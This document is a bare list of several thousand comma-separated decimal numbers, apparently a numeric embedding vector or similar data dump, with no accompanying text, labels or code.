-0.03228616714477539, -0.014497730880975723, 0.0005088369944132864, -0.01957348920404911, -0.009429734200239182, -0.027753686532378197, -0.01521175168454647, -0.0122780567035079, -0.006915138103067875, 0.012130595743656158, -0.018642157316207886, -0.024105969816446304, -0.0022274351213127375, 0.008948545902967453, -0.025968633592128754, -0.006608574651181698, -0.02106362022459507, 0.0030035448726266623, -0.0015483390307053924, -0.0028114577289670706, -0.003956219647079706, 0.00779214221984148, 0.022491661831736565, -0.023143593221902847, -0.0018975884886458516, -0.001415430218912661, 0.010950908996164799, -0.011106130667030811, 0.00013800202577840537, 0.005137846805155277, -0.0079357223585248, -0.018409324809908867, 0.005277546588331461, 0.040947552770376205, -0.012728200294077396, -0.031075436621904373, 0.0008537207613699138, -0.02593758888542652, -0.013612966053187847, -0.007369162514805794, 0.004501436837017536, -0.016344871371984482, 0.042313504964113235, -0.004416064824908972, 0.004225917626172304, -0.005044713616371155, -0.003017126815393567, -0.016531137749552727, 0.006317533552646637, -0.00219833105802536, 0.023624781519174576, -0.005347396247088909, -0.02156032994389534, -0.017276203259825706, -0.01609651744365692, 0.0005073818028904498, 0.012860138900578022, 0.03331063315272331, -0.004676061682403088, 0.012084029614925385, -0.00885541271418333, 0.01668636128306389, -0.00632141437381506, -0.03219303488731384, -0.030097536742687225, -0.005258143879473209, 0.026760265231132507, 0.018145447596907616, 0.01595681719481945, 0.013038644567131996, 0.008180197328329086, -0.019914977252483368, 0.026403255760669708, -0.02020989917218685, -0.011416574940085411, -0.013038644567131996, -0.00663961935788393, -0.038060422986745834, 0.015467868186533451, 0.020877353847026825, 0.006073059048503637, -0.016655316576361656, 0.0027901146095246077, 0.028964417055249214, -0.025859978049993515, 0.01116045843809843, -0.030749469995498657, -0.007019912824034691, -0.013488788157701492, -0.014389075338840485, -0.037067003548145294, 0.009584955871105194, -0.022383006289601326, 0.002306986367329955, -0.01570846140384674, -0.006080820225179195, 0.03554582968354225, 0.03005097061395645, 0.01844036765396595, 0.03362107649445534, -0.00004283762245904654, 0.011323441751301289, -0.008940785191953182, 0.017120981588959694, -0.0022526585962623358, 0.007811544928699732, -0.025518490001559258, -0.03188259154558182, -0.011540752835571766, -0.03610462695360184, -0.00722946273162961, 0.018781857565045357, -0.01264282874763012, 0.03337272256612778, -0.0003870847576763481, 0.0019984827376902103, -0.02005467750132084, -0.015017724595963955, -0.016267260536551476, -0.01730724796652794, 0.025471923872828484, -0.020287510007619858, 0.006344697438180447, -0.00542112672701478, 0.01584816165268421, -0.006573650054633617, -0.0017821420915424824, -0.00816467497497797, -0.020535865798592567, 0.0025165360420942307, 0.01695023849606514, -0.06475859880447388, 0.0294300839304924, -0.017245160415768623, 0.012898944318294525, -0.013481027446687222, -0.011796868406236172, -0.0307649914175272, -0.012790289707481861, -0.02343851514160633, -0.015972338616847992, 0.018781857565045357, 0.005122324451804161, 0.0224295724183321, 0.02554953470826149, 0.02565819025039673, -0.030935736373066902, 0.005040833260864019, -0.017369337379932404, -0.0067987218499183655, -0.006790960673242807, -0.010167038068175316, 0.009251228533685207, 0.0214516744017601, -0.026511911302804947, -0.011486425064504147, -0.008824368007481098, 0.009041679091751575, -0.0020237062126398087, -0.006585291586816311, 0.021482719108462334, 0.015514434315264225, 0.0027008620090782642, 0.010368826799094677, -0.01868872344493866, -0.0024951929226517677, 0.01693471521139145, 0.0120995519682765, 0.009771222248673439, -0.008413029834628105, -0.011773585341870785, 0.009010634385049343, -0.001692889491096139, 0.007900797761976719, -0.009499583393335342, -0.06066074222326279, -0.038805488497018814, 0.015483390539884567, 0.024385370314121246, 0.016857104375958443, -0.0288091953843832, -0.014381314627826214, -0.00859929621219635, 0.00013448527897708118, 0.010671509429812431, 0.014800413511693478, -0.009592716582119465, -0.0029763809870928526, 0.01844036765396595, 0.0052154576405882835, 0.06413771212100983, -0.005735451355576515, -0.004982624668627977, -0.008094824850559235, 0.002611609408631921, 0.005607393104583025, 0.002260419772937894, 0.022957326844334602, 0.012456562370061874, -0.011711496859788895, 0.012891183607280254, 0.021374063566327095, -0.01500996295362711, 0.006534844636917114, -0.027086231857538223, 0.0007921170326881111, 0.011734779924154282, 0.011796868406236172, -0.011990896426141262, -0.014699519611895084, -0.013240433298051357, -0.0022914642468094826, 0.005685004405677319, -0.012223728932440281, 0.0068220049142837524, -0.023516125977039337, -0.008273330517113209, -0.009002873674035072, 0.0011767764808610082, -0.011711496859788895, 0.0168415829539299, -0.0013436400331556797, -0.03650820627808571, 0.013550876639783382, 0.017400382086634636, -0.010454199276864529, 0.004218156915158033, -0.017136504873633385, -0.018378280103206635, 0.005452171433717012, 0.008684668689966202, -0.014528775587677956, -0.022351961582899094, 0.0037466699723154306, 0.020256465300917625, 0.0836956799030304, 0.04799462854862213, -0.02565819025039673, 0.002064452040940523, -0.014326986856758595, -0.01126911398023367, 0.01221596822142601, 0.0032266764901578426, 0.008024975657463074, -0.016795014962553978, 0.020271988585591316, 0.0018083357717841864, -0.01133120246231556, -0.010593898594379425, -0.015141901560127735, -0.0025960872881114483, 0.00972465518862009, -0.016795014962553978, -0.005199935752898455, 0.02540983445942402, 0.0001292707893298939, 0.012914466671645641, 0.027613986283540726, -0.033714208751916885, 0.0038068185094743967, -0.024214625358581543, 0.002429223619401455, 0.0018490816000849009, -0.016996804624795914, -0.019775277003645897, 0.00821900274604559, 0.01705889403820038, 0.00985659472644329, -0.003139364067465067, 0.013310282491147518, 0.004947700072079897, 0.02815726399421692, -0.015755029395222664, 0.0014775190502405167, 0.00476919487118721, 0.0032907056156545877, -0.0040318905375897884, 0.024990735575556755, -0.015343690291047096, 0.00043486402137205005, -0.020116765052080154, 0.020535865798592567, 0.005056355148553848, -0.00013484907685779035, -0.016795014962553978, -0.020349599421024323, -0.024742379784584045, 0.027645030990242958, 0.0338694304227829, -0.016282783821225166, 0.012743722647428513, -0.006631858181208372, -0.021156752482056618, 0.006290369667112827, -0.03889862075448036, 0.021125707775354385, 0.008063781075179577, 0.015312646515667439, 0.008327658288180828, -0.021855251863598824, 0.006569769233465195, -0.012037462554872036, 0.004540242254734039, 0.010586137883365154, 0.019899455830454826, 0.0031626473646610975, -0.028095174580812454, -0.0016172187170013785, -0.009352123364806175, -0.010415392927825451, 0.011106130667030811, -0.030966781079769135, 0.0074467733502388, -0.009926443919539452, -0.004159948322921991, 0.024199103936553, 0.016639793291687965, -0.001787962974049151, 0.0010011816630139947, -0.01066374871879816, -0.005044713616371155, 0.004307409282773733, 0.006759916432201862, -0.007547667715698481, -0.030252760276198387, 0.00804825872182846, 0.009592716582119465, 0.03517329692840576, 0.0003926630597561598, -0.0028638450894504786, -0.010981953702867031, 0.004125023726373911, 0.003323690267279744, -0.021141231060028076, -0.01029121596366167, 0.006433950271457434, -0.00278817443177104, 0.01769530400633812, 0.014156242832541466, -0.021358542144298553, 0.016779493540525436, 0.011944329366087914, 0.013977737165987492, 0.0245561134070158, 0.0049903858453035355, -0.017493514344096184, 0.0015570702962577343, 0.011633886024355888, -0.03560791537165642, 0.009196900762617588, -0.014707280322909355, -0.004043532069772482, 0.011866718530654907, 0.0031975724268704653, -0.013418938033282757, -0.02381104789674282, -0.0002810972509905696, 0.004346214700490236, -0.05907747894525528, -0.0005272696143947542, -0.00672887172549963, -0.01476936973631382, -0.008770040236413479, 0.015398018062114716, 0.02020989917218685, 0.04364841431379318, 0.010392109863460064, 0.009887638501822948, -0.012821333482861519, 0.04274812713265419, -0.03678760305047035, 0.0016569944564253092, 0.012441040016710758, 0.009321078658103943, 0.031059913337230682, -0.011509708128869534, 0.022646883502602577, -0.010655987076461315, 0.006492158398032188, 0.031090958043932915, -0.011688213795423508, -0.016795014962553978, 0.012316862121224403, 0.006107984110713005, 0.0203030314296484, 0.0036089105997234583, 0.0013232672354206443, 0.03622880578041077, 0.004381139762699604, 0.019014690071344376, 0.013574160635471344, 0.03684969246387482, -0.00810258649289608, -0.0122780567035079, -0.0020993768703192472, -0.022383006289601326, 0.017384858801960945, 0.025270134210586548, -0.004877849947661161, -0.007559309247881174, 0.014435642398893833, -0.011012997478246689, -0.03861922398209572, -0.022755539044737816, -0.022398527711629868, -0.0013921469217166305, 0.010826731100678444, -0.008312135934829712, -0.0006334996432997286, -0.009941966272890568, -0.009274511598050594, -0.01595681719481945, -0.020908398553729057, -0.013612966053187847, -0.0034168234560638666, -0.024028358981013298, -0.014606386423110962, -0.016748448833823204, -0.0066939471289515495, 0.035204339772462845, 0.0006921929307281971, 0.013217149302363396, -0.03237929940223694, -0.02180868573486805, 0.000004744577381643467, 0.022631362080574036, 0.03275183215737343, -0.0023826570250093937, -0.01576278917491436, -0.016344871371984482, -0.001182597246952355, 0.008374224416911602, -0.00594888161867857, 0.0008731235284358263, -0.0104619599878788, 0.017788436263799667, 0.001086553675122559, -0.007547667715698481, -0.008560490794479847, 0.023888658732175827, -0.006030373275279999, -0.006546486169099808, -0.003554582828655839, -0.010073904879391193, -0.010974192060530186, -0.016857104375958443, -0.0009259959915652871, 0.013147300109267235, 0.03951951116323471, 0.012122835032641888, 0.03461449593305588, -0.0000971956251305528, -0.020039154216647148, 0.011882240884006023, 0.03489389643073082, -0.005937240086495876, 0.012130595743656158, -0.002722205128520727, 0.019790800288319588, -0.010671509429812431, -0.04125799611210823, 0.044672880321741104, 0.011129414662718773, 0.01029121596366167, 0.007144090719521046, 0.028467707335948944, 0.02554953470826149, 0.029973359778523445, -0.002338030841201544, 0.0007169314194470644, 0.022615838795900345, 0.002580564934760332, -0.017602169886231422, 0.023842092603445053, -0.008746757172048092, 0.01035330444574356, 0.023531649261713028, -0.03604253754019737, 0.0006999539909884334, -0.0015260258223861456, -0.00022325283498503268, 0.015157423913478851, 0.04489019140601158, -0.005584110040217638, 0.008405269123613834, -0.028855761513113976, 0.03130826726555824, -0.00008440193778369576, -0.007986169308423996, -0.005735451355576515, 0.009546150453388691, 0.01477713044732809, -0.012681634165346622, 0.020411686971783638, -0.03709804639220238, 0.014730563387274742, -0.002801756374537945, -0.010337782092392445, -0.00300548505038023, -0.009064962156116962, 0.015227274037897587, 0.008723474107682705, -0.0019111703149974346, -0.017757391557097435, 0.026154899969697, -0.02466476894915104, 0.007054837886244059, -0.02218121849000454, 0.02554953470826149, -0.02691548690199852, 0.02381104789674282, -0.0019208716694265604, -0.021032575517892838, -0.008296613581478596, 0.002968620043247938, 0.0199460219591856, 0.015545479021966457, -0.011579558253288269, -0.00977898295968771, -0.010981953702867031, 0.01414848119020462, 0.005537543445825577, -0.009196900762617588, -0.020116765052080154, -0.008250047452747822, 0.01302312221378088, -0.0010933446465060115, -0.017493514344096184, -0.02319016121327877, 0.024494023993611336, 0.011439858004450798, -0.013201627880334854, 0.05941896513104439, 0.021855251863598824, -0.013325804844498634, 0.007221701554954052, -0.002532058162614703, 0.0011806570691987872, 0.017260681837797165, 0.01008942723274231, 0.004043532069772482, 0.0032829444389790297, -0.0012107312213629484, 0.019232001155614853, 0.008288852870464325, 0.027877863496541977, -0.015894727781414986, -0.014730563387274742, -0.02317463792860508, 0.012891183607280254, 0.007893036119639874, -0.0018888572230935097, 0.006596933118999004, 0.00890974048525095, -0.014683997258543968, 0.0023826570250093937, 0.023888658732175827, 0.019852887839078903, -0.04638032242655754, -0.00009780195978237316, -0.030842602252960205, -0.0013999079819768667, 0.008925262838602066, -0.009375406429171562, -0.004288006573915482, 0.03998517617583275, 0.011765824630856514, 0.004881730768829584, -0.0037718936800956726, 0.006480516865849495, 0.0019732590299099684, 0.001030285726301372, 0.03889862075448036, -0.0063873836770653725, -0.025130435824394226, -0.013915648683905602, -0.006290369667112827, -0.022786583751440048, -0.02342299371957779, -0.00616619223728776, 0.0013475206214934587, 0.025021780282258987, -0.003909653052687645, -0.00451307836920023, -0.00520381610840559, -0.0035817467141896486, -0.02542535588145256, -0.015793833881616592, -0.008669146336615086, 0.011253591626882553, 0.004008607007563114, -0.003659357549622655, -0.015366973355412483, -0.018409324809908867, -0.011688213795423508, 0.002256539184600115, -0.013628487475216389, -0.03028380312025547, -0.007687367498874664, -0.04116486385464668, 0.021901817992329597, -0.014924591407179832, -0.013931171037256718, 0.0036438354291021824, -0.0013581921812146902, -0.020722132176160812, 0.0005956642562523484, -0.009127051569521427, 0.018859468400478363, -0.017260681837797165, 0.04212724044919014, 0.01893707923591137, 0.0010234947549179196, -0.02079974301159382, 0.01657770574092865, 0.024633724242448807, -0.010601659305393696, 0.019356178119778633, -0.01172701921314001, -0.019992588087916374, -0.019247522577643394, -0.014094153419137001, 0.02120331861078739, -0.0061196256428956985, -0.009872116148471832, 0.042934391647577286, 0.027613986283540726, -0.015506673604249954, 0.03042350336909294, 0.002190569881349802, 0.003319809678941965, -0.0005335754831321537, 0.008405269123613834, -0.018533501774072647, 0.006146789528429508, 0.019977066665887833, 0.03712909296154976, -0.0032713026739656925, 0.010966431349515915, 0.015134140849113464, -0.026403255760669708, 0.000827041978482157, -0.024012837558984756, 0.005906195379793644, -0.02665160968899727, 0.020597953349351883, -0.02345403842628002, 0.023842092603445053, -0.009142572991549969, -0.009274511598050594, -0.00576649559661746, 0.0049671027809381485, 0.0055647073313593864, -0.0015774430939927697, 0.0006412607035599649, -0.008265568874776363, -0.0014270718675106764, -0.012549695558845997, -0.011789107695221901, 0.017012326046824455, 0.001112747355364263, 0.023097027093172073, -0.04352423548698425, -0.0069345408119261265, 0.03750162571668625, -0.015273841097950935, 0.014707280322909355, -0.0011137175606563687, 0.015180707909166813, -0.009740177541971207, -0.03961264342069626, 0.003129662713035941, 0.002376836258918047, 0.012448800727725029, -0.008506163023412228, -0.015095335431396961, -0.0039581600576639175, -0.007955125533044338, -0.0039814431220293045, 0.009142572991549969, 0.004125023726373911, -0.009561672806739807, 0.0050718775019049644, 0.012378951534628868, 0.0032538403756916523, 0.022351961582899094, -0.0032868250273168087, -0.0203030314296484, -0.009569433517754078, 0.011882240884006023, 0.00781930610537529, 0.02342299371957779, -0.021591374650597572, -0.008172435685992241, -0.010485243052244186, 0.013527593575417995, -0.033838387578725815, 0.018874989822506905, -0.008754518814384937, 0.004928297363221645, 0.007089762948453426, 0.004000845830887556, -0.037315357476472855, 0.0022837030701339245, -0.030733946710824966, 0.019759755581617355, 0.0009943906916305423, 0.013387894257903099, -0.0006592082791030407, -0.012045224197208881, -0.01476936973631382, -0.02093944139778614, -0.007477817591279745, 0.029073072597384453, 0.00333339162170887, 0.009134812280535698, 0.017291726544499397, -0.0004843410279136151, -0.006752155255526304, -0.011432097293436527, 0.04597674310207367, -0.0031587667763233185, 0.03666342794895172, -0.0079357223585248, 0.02269344963133335, -0.0025436999276280403, 0.009196900762617588, -0.0224295724183321, 0.002722205128520727, -0.0005655899876728654, 0.009018396027386189, 0.005017549730837345, 0.036321938037872314, 0.009414211846888065, 0.00940645020455122, -0.005541423801332712, 0.014125198125839233, 0.0030404101125895977, -0.011688213795423508, 0.0005796569748781621, 0.004346214700490236, 0.0020023633260279894, 0.01757112517952919, 0.02306598238646984, 0.004536361899226904, 0.021032575517892838, -0.011183742433786392, 0.006080820225179195, 0.013869081623852253, 0.009212423115968704, 0.01084225345402956, -0.010392109863460064, 0.0011612542439252138, -0.023733437061309814, -0.004509198013693094, 0.011191503144800663, 0.010143755003809929, 0.0008726384257897735, -0.011866718530654907, 0.01594129577279091, 0.011478663422167301, -0.016360394656658173, -0.0004874939622823149, 0.0019111703149974346, -0.0009555851574987173, 0.004284126218408346, 0.007190657313913107, 0.0006170072592794895, -0.02905755117535591, 0.006352458614856005, 0.006022612098604441, -0.003537120297551155, -0.004074576310813427, -0.012557456269860268, -0.0019373641116544604, 0.004800239112228155, -0.012014179490506649, 0.003267422318458557, 0.0037214464973658323, -0.0022759418934583664, -0.027520854026079178, 0.020892875269055367, -0.02281762845814228, -0.018719768151640892, 0.027970997616648674, -0.03275183215737343, -0.014583103358745575, 0.005805301014333963, -0.003490553703159094, 0.006430069450289011, 0.004008607007563114, -0.004870088770985603, 0.008832129649817944, -0.023950748145580292, 0.007520503830164671, -0.020287510007619858, 0.009189140051603317, 0.020101243630051613, 0.01216164045035839, -0.0005651049432344735, 0.00048773648450151086, 0.0020838547497987747, 0.01583264023065567, -0.011789107695221901, -0.020613476634025574, -0.007439012173563242, 0.0037641325034201145, -0.022708972916007042, 0.01767978072166443, -0.0029627990443259478, 0.011827913112938404, -0.013915648683905602, 0.009235706180334091, 0.022398527711629868, 0.014218331314623356, 0.02494416944682598, 0.0015871445648372173, -0.012262534350156784, -0.01476936973631382, 0.010818970389664173, 0.0018180371262133121, 0.01743142493069172, -0.0010555093176662922, -0.025518490001559258, 0.002384597435593605, -0.01178134698420763, 0.0002963769366033375, 0.010430915281176567, -0.005855748429894447, -0.015529956668615341, 0.004982624668627977, -0.012262534350156784, 0.012169401161372662, -0.00885541271418333, -0.0035565230064094067, -0.011354486458003521, 0.011820152401924133, -0.0045868088491261005, -0.009678089059889317, -0.009988533332943916, 0.03250347822904587, -0.0045790476724505424, -0.010850015096366405, -0.031199613586068153, -0.012084029614925385, 0.02631012164056301, -0.012572978623211384, 0.010050621815025806, 0.012464323081076145, 0.019635576754808426, 0.018005747348070145, 0.009584955871105194, -0.0016851284308359027, -0.00703931599855423, -0.01708993688225746, 0.005502618383616209, 0.006453352980315685, -0.0020237062126398087, 0.013046405278146267, 0.0019422147888690233, 0.004090098664164543, 0.014451163820922375, 0.008987351320683956, 0.0021653464064002037, -0.019728710874915123, 0.01806783676147461, -0.005735451355576515, 0.0187973789870739, -0.0026484746485948563, 0.006853049620985985, 0.021591374650597572, -0.0029977241065353155, 0.01583264023065567, -0.021343018859624863, -0.0034575690515339375, 0.0078076645731925964, -0.014070870354771614, -0.0033993609249591827, 0.0006393204093910754, -0.018145447596907616, 0.000848385039716959, 0.007442892994731665, 0.017602169886231422, -0.0058945538476109505, 0.0007373042753897607, 0.022398527711629868, 0.010493004694581032, 0.012565217912197113, -0.006243803072720766, -0.004365617409348488, -0.02655847743153572, -0.02216569520533085, -0.020489297807216644, 0.011051803827285767, 0.01780395768582821, 0.009375406429171562, -0.00429576775059104, 0.00971689447760582, 0.0007819306338205934, 0.00604977598413825, 0.011719257570803165, -0.002619370585307479, -0.025254612788558006, -0.0007858111639507115, 0.03237929940223694, -0.006616335827857256, 0.021141231060028076, 0.011338964104652405, 0.011307919397950172, -0.006562008056789637, -0.004047412425279617, -0.002475790213793516, 0.002425343031063676, -0.01892155595123768, 0.0059255980886518955, 0.0003446412447374314, 0.001030285726301372, -0.0058130621910095215, -0.004260842688381672, -0.026775788515806198, -0.010073904879391193, 0.01643800549209118, -0.015661895275115967, -0.006476636044681072, -0.016236217692494392, 0.0019713188521564007, -0.010205843485891819, -0.0017132624052464962, -0.005875151138752699, -0.014039825648069382, -0.029352473095059395, -0.014505491591989994, 0.01780395768582821, -0.006022612098604441, -0.007466176059097052, 0.008552730083465576, -0.005952761974185705, -0.010516287758946419, 0.007722292561084032, -0.02118779718875885, 0.01239447295665741, 0.00940645020455122, 0.006107984110713005, -0.012076267972588539, -0.005840226076543331, 0.013092972338199615, -0.011494185775518417, 0.004881730768829584, 0.00632141437381506, 0.009903160855174065, 0.009709133766591549, 0.009002873674035072, -0.001554159796796739, -0.0006213728920556605, -0.00762915937229991, -0.0020198256243020296, 0.0028211590833961964, -0.0015687119448557496, -0.01733829267323017, 0.00495934160426259, -0.0034827927593141794, 0.007004390936344862, -0.0025010136887431145, 0.0054017240181565285, 0.018098879605531693, 0.023997314274311066, -0.010081666521728039, 0.015739506110548973, 0.010702554136514664, -0.000030256154786911793, -0.009685849770903587, 0.011595080606639385, 0.0035565230064094067, -0.004059054423123598, 0.008017214015126228, 0.016795014962553978, 0.015537718310952187, -0.0024428055621683598, -0.0011360306525602937, -0.02443193644285202, 0.011610602028667927, -0.019154390320181847, -0.002299225190654397, -0.010749120265245438, 0.031354837119579315, 0.006837527267634869, 0.008063781075179577, 0.019651100039482117, 0.007221701554954052, -0.011129414662718773, 0.004109501373022795, -0.00004268603879609145, -0.015429062768816948, 0.02132749743759632, -0.012658351100981236, -0.002506834687665105, 0.002091615926474333, 0.002731906482949853, -0.022367484867572784, 0.0014445343986153603, 0.027365630492568016, 0.0015134140849113464, -0.010135994292795658, -0.012239251285791397, -0.001866544014774263, -0.008017214015126228, 0.003785475390031934, 0.008187958039343357, 0.003610850777477026, 0.019604533910751343, -0.018409324809908867, 0.0010535690234974027, -0.012402234598994255, -0.01532040722668171, 0.02070660889148712, 0.037439536303281784, -0.007062599062919617, 0.01340341567993164, 0.011261353269219398, 0.0007285730680450797, 0.00224295724183321, 0.011564035899937153, 0.003901891876012087, 0.021001530811190605, -0.013481027446687222, -0.0018374399514868855, -0.00036913721123710275, 0.01606547273695469, -0.01794365793466568, 0.005362918600440025, 0.010516287758946419, 0.005723809823393822, 0.015250557102262974, -0.0001156888683908619, 0.011773585341870785, -0.009072723798453808, 0.005425007548183203, -0.01744694821536541, -0.008366463705897331, 0.0035041356459259987, -0.0053784409537911415, -0.007784381043165922, 0.016903670504689217, 0.023128071799874306, 0.019138867035508156, -0.00022070622071623802, 0.0224295724183321, -0.012487606145441532, 0.0038242810405790806, 0.0029938435181975365, 0.012875661253929138, -0.0162206944078207, 0.005681123584508896, 0.025456400588154793, 0.018611112609505653, 0.0061933561228215694, -0.02592206746339798, 0.020597953349351883, -0.013985498808324337, 0.009895400144159794, -0.009872116148471832, 0.008056019432842731, -0.00787363387644291, 0.007582592777907848, -0.00517665222287178, -0.011067325249314308, 0.0012330444296821952, 0.002718324540182948, -0.010322259739041328, -0.009949727915227413, 0.01178134698420763, -0.007671845145523548, -0.04482810199260712, -0.0027901146095246077, -0.001944154966622591, 0.0034730914048850536, 0.006872452329844236, 0.018285145983099937, 0.001909230137243867, 0.014319225214421749, 0.007186776492744684, -0.01584816165268421, -0.0003213579475414008, 0.000040442595491185784, 0.00971689447760582, 0.0034478676971048117, 0.00426860386505723, 0.006818124558776617, 0.005304710473865271, 0.01394669245928526, -0.0011321501806378365, 0.0013009540271013975, -0.007656323257833719, 0.005785898305475712, -0.016639793291687965, 0.027117276564240456, -0.003030708758160472, -0.019899455830454826, 0.007431250996887684, -0.0019208716694265604, 0.01570846140384674, -0.01792813651263714, -0.013822515495121479, -0.011928807012736797, 0.001887887017801404, -0.012309101410210133, 0.01780395768582821, 0.013574160635471344, -0.0009036828414537013, 0.0057897791266441345, -0.024074925109744072, -0.004889491479843855, 0.009352123364806175, -0.013496548868715763, 0.0038165198639035225, 0.010687031783163548, 0.006627977825701237, -0.0009924503974616528, -0.014226092025637627, 0.009220183826982975, -0.012138357385993004, -0.026216989383101463, 0.013620726764202118, 0.011812390759587288, 0.009057201445102692, -0.02280210517346859, 0.009243467822670937, 0.005413365550339222, 0.008521685376763344, 0.0045790476724505424, 0.036321938037872314, -0.003692342434078455, -0.014303703792393208, 0.020039154216647148, 0.029585305601358414, -0.01733829267323017, -0.021343018859624863, 0.007947363890707493, 0.0004074576427228749, 0.01301536150276661, -0.013434460386633873, -0.012115073390305042, -0.011129414662718773, 0.0078076645731925964, 0.02918172813951969, -0.01140881422907114, 0.00303846993483603, -0.001277670729905367, -0.00501366937533021, 0.027862342074513435, 0.014257136732339859, -0.022972850129008293, -0.008583773858845234, -0.017043370753526688, 0.018766334280371666, 0.0178194809705019, 0.005219338461756706, 0.004373378586024046, 0.028188306838274002, -0.003488613525405526, -0.007671845145523548, 0.027194887399673462, -0.013760427013039589, -0.005875151138752699, -0.024587158113718033, -0.02780025266110897, 0.005056355148553848, 0.0078464699909091, 0.02019437588751316, -0.02329881675541401, -0.010050621815025806, -0.007326476275920868, -0.016003383323550224, -0.02280210517346859, 0.005036952439695597, -0.003915473818778992, -0.005634556990116835, -0.007008271291851997, 0.007008271291851997, -0.008630340918898582, 0.011307919397950172, 0.0037680130917578936, -0.010888820514082909, 0.010485243052244186, -0.006841407623142004, -0.0027125037740916014, -0.030951257795095444, -0.005723809823393822, -0.010066144168376923, -0.013193866237998009, -0.02443193644285202, 0.02568923309445381, 0.0031277225352823734, 0.0071052853018045425, 0.015770550817251205, 0.0012281937524676323, -0.023236727342009544, 0.01121478620916605, 0.01930961199104786, 0.020473776385188103, -0.017105460166931152, -0.010555093176662922, -0.00896406825631857, -0.01239447295665741, 0.02865397371351719, 0.0023341502528637648, 0.009453017264604568, 0.03265869989991188, -0.01656218245625496, 0.029849182814359665, 0.019790800288319588, 0.005347396247088909, -0.01656218245625496, 0.02356269396841526, -0.007730053272098303, -0.007411848288029432, 0.0015745327109470963, -0.026713699102401733, -0.01221596822142601, -0.006236042361706495, -0.0013184165582060814, -0.012316862121224403, -0.025735801085829735, 0.016112038865685463, 0.004905013833194971, -0.03852609172463417, -0.013116255402565002, 0.025611622259020805, 0.016422482207417488, 0.0199460219591856, -0.012604023329913616, 0.029693961143493652, -0.008498402312397957, 0.009903160855174065, -0.022476138547062874, -0.01595681719481945, 0.013783710077404976, -0.007279909681528807, 0.026744743809103966, 0.015157423913478851, -0.007341998629271984, -0.014179525896906853, 0.01035330444574356, -0.01576278917491436, 0.010298976674675941, 0.01109836995601654, 0.002559222048148513, -0.02739667519927025, 0.00012781558325514197, 0.012441040016710758, -0.007640800904482603, -0.009352123364806175, 0.0027998159639537334, 0.006872452329844236, 0.009592716582119465, 0.005002027377486229, -0.008071541786193848, 0.0008896158542484045, 0.003490553703159094, -0.029228294268250465, 0.004839044529944658, -0.00362831330858171, 0.002081914572045207, 0.005816943012177944, -0.004947700072079897, -0.0029822017531841993, -0.00005560099089052528, -0.004501436837017536, 0.002256539184600115, 0.012619544751942158, 0.00011162641749251634, 0.005673362407833338, 0.021249886602163315, -0.004835164174437523, -0.011044042184948921, 0.000701409240718931, 0.017415903508663177, -0.0027163843624293804, -0.0066124554723501205, -0.0104619599878788, -0.0016424423083662987, -0.000019827179130516015, -0.0266826543956995, -0.015351451933383942, 0.006142909172922373, -0.004563525784760714, -0.0073458789847791195, -0.01308521069586277, -0.01146314200013876, -0.0007601025281473994, -0.023624781519174576, 0.01584816165268421, -0.003653536783531308, 0.0168415829539299, 0.003969801589846611, -0.006662902422249317, -0.009755699895322323, -0.016857104375958443, -0.014854741282761097, 0.01172701921314001, 0.002008184092119336, -0.03948846459388733, 0.008125869557261467, -0.0069927494041621685, 0.02142062969505787, -0.001459086430259049, 0.015429062768816948, 0.00044092736789025366, 0.02393522672355175, -0.003024887992069125, -0.01980632171034813, 0.02578236721456051, -0.019883932545781136, 0.021405108273029327, 0.017415903508663177, 0.005044713616371155, -0.010120471939444542, 0.028374573215842247, 0.002502954099327326, 0.00928227324038744, 0.009647044353187084, -0.004206514917314053, 0.001666695810854435, 0.008234525099396706, 0.006682305131107569, 0.010050621815025806, 0.020535865798592567, -0.008296613581478596, -0.023842092603445053, 0.0033101083245128393, 0.015157423913478851, -0.020163333043456078, 0.022833149880170822, -0.016143083572387695, -0.021498240530490875, 0.005355157423764467, 0.004866208415478468, 0.014365792274475098, 0.011858957819640636, -0.005638437811285257, 0.03026828169822693, -0.007373042870312929, -0.012945511378347874, 0.01046972069889307, 0.0005466723232530057, 0.01668636128306389, 0.019107822328805923, -0.008886457420885563, -0.008839890360832214, -0.0031587667763233185, -0.002611609408631921, -0.006375742144882679, 0.00048676636652089655, 0.00004298920612200163, -0.009763461537659168, 0.00852944701910019, -0.0209239199757576, 0.04656658694148064, -0.01572398468852043, -0.012441040016710758, -0.007788261864334345, -0.023966269567608833, 0.0035953286569565535, 0.0307649914175272, -0.014272659085690975, 0.0203030314296484, -0.022631362080574036, -0.007295432034879923, 0.0018539322772994637, -0.037191182374954224, -0.006903496570885181, -0.00517665222287178, -0.01259626168757677, -0.010749120265245438, 0.017043370753526688, 0.009833310730755329, -0.009786744602024555, -0.006569769233465195, -0.012751484289765358, 0.007439012173563242, -0.01190552394837141, 0.0024059403222054243, 0.0026251913513988256, -0.0027513091918081045, 0.021156752482056618, -0.003793236566707492, 0.011377769522368908, 0.005995448213070631, 0.0002359858772251755, 0.010850015096366405, -0.005196054931730032, -0.001112747355364263, 0.0052969492971897125, 0.005021430552005768, 0.002264300361275673, -0.024400891736149788, 0.0039503988809883595, 0.01396997645497322, 0.019542444497346878, 0.007613637018948793, -0.005502618383616209, 0.016515616327524185, 0.0026950412429869175, 0.009786744602024555, -0.000014392895536730066, 0.028747105970978737, 0.001722963759675622, -0.02716384269297123, 0.04122695326805115, 0.006860810332000256, 0.00804825872182846, -0.007924080826342106, -0.0035856273025274277, -0.0162206944078207, -0.011020759120583534, 0.010912103578448296, -0.02120331861078739, -0.0022972850129008293, -0.031122002750635147, -0.009367644786834717, -0.02019437588751316, -0.0035487620625644922, 0.002178928116336465, 0.012976556085050106, -0.011688213795423508, -0.00303846993483603, -0.007310954388231039, -0.0022196739446371794, 0.004955460783094168, 0.0006587231764569879, -0.005836345721036196, 0.0014629669021815062, 0.003993084654211998, 0.005910076200962067, -0.016344871371984482, -0.006286489311605692, -0.010477482341229916, 0.02020989917218685, -0.005479335319250822, -0.010531810112297535, -0.009134812280535698, 0.00019754419918172061, 0.004532481078058481, 0.013900126330554485, -0.009064962156116962, 0.012363429181277752, 0.01164164673537016, 0.0011059565003961325, -0.0068220049142837524, -0.0010108830174431205, 0.03542165085673332, 0.010135994292795658, 0.00821900274604559, -0.00573157100006938, 0.007730053272098303, -0.02044273167848587, -0.009150334633886814, 0.005774256773293018, 0.005797540303319693, 0.005754854064434767, -0.0024098209105432034, -0.017540080472826958, 0.012541933916509151, -0.0026892204768955708, 0.008576013147830963, -0.002182808704674244, -0.00009458838030695915, 0.00009701372619019821, -0.011238069273531437, 0.011750302277505398, -0.007439012173563242, 0.008816607296466827, 0.0075088622979819775, 0.0032286166679114103, -0.019247522577643394, 